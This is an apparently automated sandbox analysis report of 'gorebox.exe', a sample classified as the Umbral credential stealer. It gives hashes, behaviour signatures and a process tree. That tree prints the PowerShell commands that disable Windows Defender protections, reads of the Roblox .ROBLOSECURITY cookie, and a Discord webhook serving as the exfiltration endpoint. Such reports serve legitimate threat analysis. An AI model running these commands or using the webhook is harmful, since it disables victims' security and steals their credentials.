Overview

overview

10

Static

static

3

gorebox.exe

windows10-ltsc 2021-x64

10

Resubmissions

01-12-2024 09:08

241201-k34dyayqat 10

01-12-2024 08:43

241201-kmxapaypcz 10

Analysis

  • max time kernel
    97s
  • max time network
    140s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    01-12-2024 08:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    gorebox.exe

  • Size

    433KB

  • MD5

    cc25bf7377c0ac9204180e9f7291456a

  • SHA1

    2564bdbe4d34317222e0f6d8319868f2d9310c1c

  • SHA256

    1dc70027f52c53ee62f42585d875c8ee665c62c1a3688090c4031bd443549dc3

  • SHA512

    a785074fc29f63b785aad523c8889c2c3f20f52599e6b5715f12c3aaf873fcbeb53f68b5d32a29494d90999fc9f3b3dc6e7c728f0440434aa827c7171df78195

  • SSDEEP

    6144:YahOrp0yN90QEoh+Kg4+CAQepPq06NaqQxFAyPjbBW8mpqf+JvQxPRt:Yi7y90C+T4+CAnpPqoqQx59W89+J8b

Score
10/10
umbralexecutionpersistencespywarestealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1312553527435984916/bA-hbry9izKY0icMXgK9Nr6rEcNwmzCA1_QKEDcV4uegdqzcVCTUfnkyX2nsI1C3Coao

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\gorebox.exe
    "C:\Users\Admin\AppData\Local\Temp\gorebox.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GoreBox.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GoreBox.exe
      2⤵
      • Executes dropped EXE
      PID:4012
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\goreboxr.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\goreboxr.exe
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3760
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:444
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\goreboxr.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3812
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3744
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3916
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1748
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3248
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3676
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4580
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        • Suspicious behavior: EnumeratesProcesses
        PID:2112

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    60ba7ac90c0e466144b48a90919960b6

    SHA1

    fe7f5d9e1d317f9409d8daa35d9c890f7e222d6a

    SHA256

    43d3c3113c66141b3a1f1f1bbf2d32a80128d029903ca58db09e9c6a9410ef9e

    SHA512

    92a1d912fd7be06820ec97b192b965d04ff44ff6a1c76b55405ecf20ca995762d823f52f174d8f48feb1d454716ab244adb4945febbf4fe4a6f91dd9791f87f2

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    948B

    MD5

    1297ab1638f5754968fea0e770ae6b77

    SHA1

    31d494d49591b10227e9e20441102f15e089c0eb

    SHA256

    9ccaa5d197966ed0d707103be05ab3e5b48f9992545d743d5bc8fa2a00d905f8

    SHA512

    105ad4ced4851c6b78e5a8038b1c5584ecea0eb32087994f7fefde86207961739b5d6ed64f64d9e5298b1c149069c6cb3b7658e56bb329ed79f5ff6a25c18f3f

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    cce846d4d061ab3c9c60e2e4723afc37

    SHA1

    dbfb35606ef1ba6a8fe0761baf0a5a8d61ddc3d0

    SHA256

    05493954effa576bee288b5da8a22c2b8cf6b3f1f7a7f49d430ff7c959e78385

    SHA512

    c21366673b03e1fd661acba46d00200f83df5a40668f1c39abcf6e0d92370a8fc40758e487566fd7066b185f0658d9f149f293dce01235b60fbac8c40f4d7172

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    3fe8acacbcea9723436f6a8a96ca56a6

    SHA1

    69bfb0cfb7debbc189283ce7728132bace1fb8d9

    SHA256

    71303800d8cc8b399bf9332dde36ba3f123adc6d9b8e30252a7225829e8777f3

    SHA512

    b14ff78ffd5b61c6e97fc368429f3c6678d1a72a7e8a4ceba2cf75b5b8111bebf0429f7616d88ebadc3fef43cd6ce52c6ce1a296dc4e9f3f174dcd2bc372c9ef

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GoreBox.exe
    Filesize

    651KB

    MD5

    5b23e32cdf5236587cf71ce4b5f001a6

    SHA1

    f9ab18bb610b5e999320e422f4fffd05ed08209a

    SHA256

    11cfef86247a1725b6ac0ad49bb40217d6758c2fae04041f7aa1b73c68795d72

    SHA512

    82859dc2637ec91af549cb402afafc1a2f09c73b7046eecaf81b366abd7b003f74f12b50b198ed79e49beb56f1117e2b9164d05bd9a650858db80075d39fee42

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\goreboxr.exe
    Filesize

    275KB

    MD5

    97a8417cd8fa79bce383a00a55568274

    SHA1

    a2b3789316bf0cce8826f7377a6ccfea8b4aa08d

    SHA256

    7c3217c00a01cbb6cfd0243869490f4d7c48cc41626a472d88b406f196978810

    SHA512

    417741e48d0cc5c5913fcce861662c927bf43d4d568144ab719bd19eca9f8ced0fdffd77fcd7c899ff3474f570274c1faab85b47a1d269230b18c5f7ad7a81a4

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_na4vujy4.jw3.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/3744-36-0x0000020FBA8B0000-0x0000020FBAACD000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/3760-66-0x00000170ABED0000-0x00000170ABEE2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3760-38-0x0000017093210000-0x0000017093286000-memory.dmp

    Filesize

    472KB

    Download

  • memory/3760-39-0x0000017093170000-0x00000170931C0000-memory.dmp

    Filesize

    320KB

    Download

  • memory/3760-40-0x0000017093150000-0x000001709316E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3760-11-0x00007FFCB9580000-0x00007FFCBA042000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3760-10-0x00000170914D0000-0x000001709151A000-memory.dmp

    Filesize

    296KB

    Download

  • memory/3760-65-0x00000170932A0000-0x00000170932AA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3760-9-0x00007FFCB9583000-0x00007FFCB9585000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3760-86-0x00000170ABCE0000-0x00000170ABE87000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/3760-87-0x00007FFCB9580000-0x00007FFCBA042000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3812-21-0x0000023A73390000-0x0000023A733B2000-memory.dmp

    Filesize

    136KB

    Download